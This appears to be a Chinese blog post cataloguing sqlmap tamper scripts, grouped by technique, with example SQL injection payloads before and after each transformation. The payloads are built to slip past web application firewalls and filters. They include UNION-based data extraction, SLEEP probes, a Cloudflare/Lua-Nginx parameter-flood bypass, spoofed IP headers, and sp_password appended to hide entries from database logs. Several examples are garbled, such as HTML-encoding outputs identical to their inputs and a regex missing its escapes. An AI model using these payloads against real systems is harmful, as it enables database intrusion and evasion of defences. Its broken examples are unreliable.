最近在看脚本,感觉想用什么不太好找,整理了一下,也分享给大家。
整理不易,感谢大家点个赞或者在看
word文档排版可能更好一点:后台回复221019领取
替换
替换单引号
1、apostrophemask.py : 用UTF-8全角字符替换单引号字符
" Replaces apostrophe character with its UTF-8 full width counterpart "
‘替换为%EF%BC%87
tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
2、apostrophenullencode.py : 用非法双字节unicode字符替换单引号字符
" Replaces apostrophe character with its illegal double unicode counterpart "
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
替换UNION
57.dunion.py:将空格UNION替换为DUNION
Replaces instances of <int> UNION with <int>DUNION
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'
64、misunion.py:替换空格UNION为-.1UNION
Replaces instances of UNION with -.1UNION
https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf
tamper('1 UNION ALL SELECT')
'1-.1UNION ALL SELECT'
52、0eunion.py:将空格UNION替换为e0UNION
“Replaces instances of <int> UNION with <int>e0UNION”
tamper('1 UNION ALL SELECT')
'1e0UNION ALL SELECT'
45、unionalltounion.py : 用“UNION SELECT”替换“UNION ALL SELECT”
" Replaces UNION ALL SELECT with UNION SELECT "
tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
替换运算符
替换=
13、equaltolike.py : 用'LIKE'操作符替换所有的('=')
" Replaces all occurances of operator equal ('=') with operator 'LIKE' "
tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
58、equaltorlike.py:用'RLIKE'操作符替换所有的('=')
Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'
替换+
27、plus2concat.py : 用CONCAT() 函数替换('+')
" Replaces plus ('+') character with function CONCAT() "
tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
28、plus2fnconcat.py : 用ODBC函数{fn CONCAT()}替换('+')
" Replaces plus ('+') character with ODBC function {fn CONCAT()} "
https://msdn.microsoft.com/en-us/library/bb630290.aspx
tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
替换>,逻辑运算符
15、greatest.py : 用'GREATEST'替换('>') 运算符
" Replaces greater than operator ('>') with 'GREATEST' counterpart "
GREATEST是sql命令,所以对大多数的数据库都有用
tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
62、least.py:将大于运算符(“>”)替换为“LEAST”
Replaces greater than operator ('>') with 'LEAST' counterpart
tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
44、symboliclogical.py : 用字符(&&和||)替换逻辑运算符AND和OR
" Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) "
re.sub(r"(?i)bANDb", "%26%26", re.sub(r"(?i)bORb", "%7C%7C", payload))
tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
替换空格
33、space2comment.py : 用注释符'/**/'替换空字符('')
" Replaces space character (' ') with comments '/**/' "
tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
34、space2dash.py : 用破折号注释符"--"加一个随机字符串和一个换行符替换空格符
" Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('n') "
在ZeroNights SQL 注入挑战赛期间使用
https://proton.onsec.ru/contest/
tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'
35、space2hash.py : 用注释符"#"加一个随机字符串和一个换行符替换空格符
" Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('n') "
在ModSecuritySQL 注入挑战赛期间使用
http://modsecurity.org/demo/challenge.html
tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'
36、space2morecomment.py : 用'/**_**/' 替换空格符
" Replaces space character (' ') with comments '/**_**/' "
tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
37、space2morehash.py : 用注释符"#"加一个随机字符串和一个换行符替换空格符
" Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('n') "
这个(MySQL >= 5.1.13)mysql版本比space2hash(MySQL 4.0, 5.0)高
amper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'
38、space2mssqlblank.py : mssql用一组有效的备选字符集当中的随机空白符替换空格符
" Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters "
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'
39、space2mssqlhash.py : 用注释符"#"加上一个换行符替换空格符
" Replaces space character (' ') with a pound character ('#') followed by a new line ('n') "
tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
40、space2mysqlblank.py : mysql用一组有效的备选字符集当中的随机空白符替换空格符
" Replaces space character (' ') with a random blank character from a valid set of alternate characters "
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'
41、space2mysqldash.py : 用破折号注释符"--"加一个换行符替换空格符
" Replaces space character (' ') with a dash comment ('--') followed by a new line ('n') "
tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
42、space2plus.py : 用加号"+"替换空格符
" Replaces space character (' ') with plus ('+') "
tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
43、space2randomblank.py : 用一组有效的备选字符集当中的随机空白符替换空格符[大部分数据库]
" Replaces space character (' ') with a random blank character from a valid set of alternate characters "
blanks = ("%09", "%0A", "%0C", "%0D")
tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
46、unmagicquotes.py : 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
" Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) "
http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
绕过magic_quotes/addslashes特征
tamper("1' AND 1=1")
'1%bf%27-- -'
替换函数
11、commalessmid.py : 用'MID(A FROM B FOR C)' 替换'MID(A, B, C)'
" Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' "
amper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'
12、concat2concatws.py : 用'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' 替换'CONCAT(A, B)'
" Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' "
绕过防火墙过滤CONCAT函数
tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
61、ifnull2casewhenisnull.py:将“IFNULL(A, B)”等实例替换为“CASE WHEN ISNULL(A) THEN (B) ELSE (A) END”
Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'
18、ifnull2ifisnull.py : 用'IF(ISNULL(A), B, A)'替换'IFNULL(A, B)'
" Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' "
tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
65、ord2ascii.py:将 ORD()替换为 ASCII()调用
Replaces ORD() occurences with equivalent ASCII() calls
tamper("ORD('42')")
"ASCII('42')"
69、substring2leftright.py:用LEFT 和RIGHT替换 SUBSTRING
Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
68、sleep2getlock.py:将sleep替换为GET_LOCK('、%s',5)
Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"
https://zhuanlan.zhihu.com/p/35245598
绕过过滤tSLEEP() 和 BENCHMARK()函数
tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
True
其他替换
59、hex2char.py:用等价的concat(char(),…)替换每个(mysql) 0x<十六进制>编码的字符串
Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
24、nonrecursivereplacement.py : 用适合替换的表示(例如.replace(“SELECT”,“”))替换预定义的SQL关键字
" Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters "
10、commalesslimit.py : 用'LIMIT N OFFSET M'替换'LIMIT M, N'
" Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' "
tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
双重利用替换
5、between.py :用'NOT BETWEEN 0 AND #' 替换('>')、 'BETWEEN # AND #'替换('=')
" Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' "
" Replaces equals operator ('=') with 'BETWEEN # AND #' "
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
6、bluecoat.py : 用有效的随机空白符替换SQL语句后空格符, 然后用LIKE操作符替换字符'='
" Replaces space character after SQL statement with a valid random blank character. Afterwards replace character = with LIKE operator "
https://kb.bluecoat.com/index?page=content&id=FAQ2147
有用的绕过Blue Coat的推荐w a f规则配置
tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
编码
3、appendnullbyte.py : 在payload末尾添加空字符编码
" Appends encoded NULL byte character at the end of payload "
tamper('1 AND 1=1')
'1 AND 1=1%00'
4、base64encode.py : 对payload进行Base64编码
"Base64 all characters in a given payload"
tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
7、chardoubleencode.py : 对给定的payload全部字符进行两次URL编码(不处理已经编码的字符)
" Double url-encodes all characters in a given payload (not processing already encoded) "
tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""
8、charencode.py :对给定的payload全部字符使用URL编码(不处理已经编码的字符)
" Url-encodes all characters in a given payload (not processing already 20 encoded) "
对于绕过非常弱的web应用程序防火墙很有用,这些防火墙在通过它们的规则集处理请求之前不进行url解码
web服务器将无论如何传递url解码版本后,因此它应该对任何DBMS工作
tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
9、charunicodeencode.py : 对给定的payload中没有编码字符使用Unicode URL编码(不处理已经编码的字符)
" Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) "
tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
54.charunicodeescape.py: Unicode转义给定有效负载中的非编码字符(不处理已编码的字符)
Unicode-escapes non-encoded characters in a given payload (not processing already encoded)
有效过滤json文本下对于and或者or的弱过滤
tamper('SELECT FIELD FROM TABLE')
'\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054\\u0020\\u0046\\u0049\\u0045\\u004C\\u0044\\u0020\\u0046\\u0052\\u004F\\u004D\\u0020\\u0054\\u0041\\u0042\\u004C\\u0045'
56.decentities.py:用十进制(使用码位)编码所有字符
HTML encode in decimal (using code points) all characters
tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
60、hexentities.py:用十六进制(使用编码点)编码所有字符
tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
17、htmlencode.py : HTML编码所有非字母数字字符(使用代码点)
" HTML encode (using code points) all non-alphanumeric characters "
>>> tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
>>> tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
66、overlongutf8more.py:将给定的payload中的所有字符转换为超长 UTF8(不处理已编码的 UTF8)
Converts all characters in a given payload to overlong UTF8 (not processing already encoded)
* https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
tamper('SELECT FIELD FROM TABLE WHERE 2>1') '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'
25、overlongutf8.py : 转换给定的payload当中的所有字符(不包括已经编码的)
" Converts all characters in a given payload (not processing already encoded) "
tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
大小写
20、lowercase.py : 将每个关键字的字符替换为小写
" Replaces each keyword character with lower case value "
绕过写得很差的宽松正则表达式
tamper('INSERT')
'insert'
47、uppercase.py : 将关键字替换为大写
" Replaces each keyword character with upper case value "
tamper('insert')
'INSERT'
29、randomcase.py : 随机转换每个关键字字符的大小写
" Replaces each keyword character with random case value "
tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'
添加
加注释
55、commentbeforeparentheses.py:在括号前加内联注释
Prepends (inline) comment before parentheses
绕过web应用程序的防火墙,阻止使用函数调用
tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
16、halfversionedmorekeywords.py : 在每个关键字之前添加MySQL注释
" Adds versioned MySQL comment before each keyword "
在模组安全性 SQL 注入挑战赛期间使用,
tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
"""
19、informationschemacomment.py : 在所有出现在"information_schema"黑名单中的标识符的末尾添加注释
" Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier "
tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
21、modsecurityversioned.py : 用版本注释将每个完整查询包起来
" Embraces complete query with versioned comment "
bypass ModSecurity WAF
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'
22、modsecurityzeroversioned.py : 用零版本注释包围完整的查询
" Embraces complete query with zero-versioned comment "
bypass ModSecurity WAF
tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
30、randomcomments.py : 向SQL关键字中插入随机注释
" Add random comments to SQL keywords "
tamper('INSERT')
'I/**/NS/**/ERT'
49、versionedkeywords.py : 用(MySQL)版本注释括起每个非函数关键字
" Encloses each non-function keyword with versioned MySQL comment "
tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
50、versionedmorekeywords.py : 用(MySQL)版本注释括起每个关键字
" Encloses each keyword with versioned MySQL comment "
tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
加其他
14、escapequotes.py : 在单引号、双引号前面添加反斜线
" Slash escape quotes (' and ") "
tamper('1" AND SLEEP(5)#')
'1\\" AND SLEEP(5)#'
23、multiplespaces.py : 在SQL关键字周围添加多个空格
" Adds multiple spaces around SQL keywords "
https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
26、percentage.py : 在每个字符之前添加一个百分号
" Adds a percentage sign ('%') infront of each character "
tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
31、securesphere.py : 添加经过特殊构造的字符串
" Appends special crafted string "
67、schemasplit.py:拆分FROM后的标识符用空格9.e.
Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')
tamper('SELECT id FROM testdb.users')
'SELECT id FROM testdb 9.e.users'
32、sp_password.py : 向payload末尾添加"sp_password"自动化混淆DBMS日志
" Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs "
* 将sp_password附加到查询末尾会将从 T-SQL 日志中隐藏( T-SQL 日志安全措施导致的)
http://websec.ca/kb/sql_injection
tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
53、binary.py : 在可能的地方注入关键字二进制(binary )
" Injects keyword binary where possible"
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
绕过waf
63、luanginx.py:绕过LUA-Nginx WAFs,比如Cloudflare
LUA-Nginx WAFs Bypass (e.g. Cloudflare)
https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/
Lua-Nginx WAF不支持处理超过100个参数
random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
'34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1'
48、varnish.py : 添加一个HTTP头"X-originating-IP"来绕过WAF
" Append a HTTP header 'X-originating-IP' to bypass WAF Protection of Varnish Firewall "
* https://web.archive.org/web/20160815052159/
http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
>> X-remote-IP: * or %00 or %0A
51、xforwardedfor.py : 添加一个伪造的HTTP头'X-Forwarded-For'来绕过WAF
" Append a fake HTTP header 'X-Forwarded-For' to bypass WAF (usually application based) protection "
# Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection
headers["Via"] = "1.1 Chrome-Compression-Proxy"
# Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007
headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]
原文始发于微信公众号(灼剑安全团队):sqlmap-tamper脚本整理
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论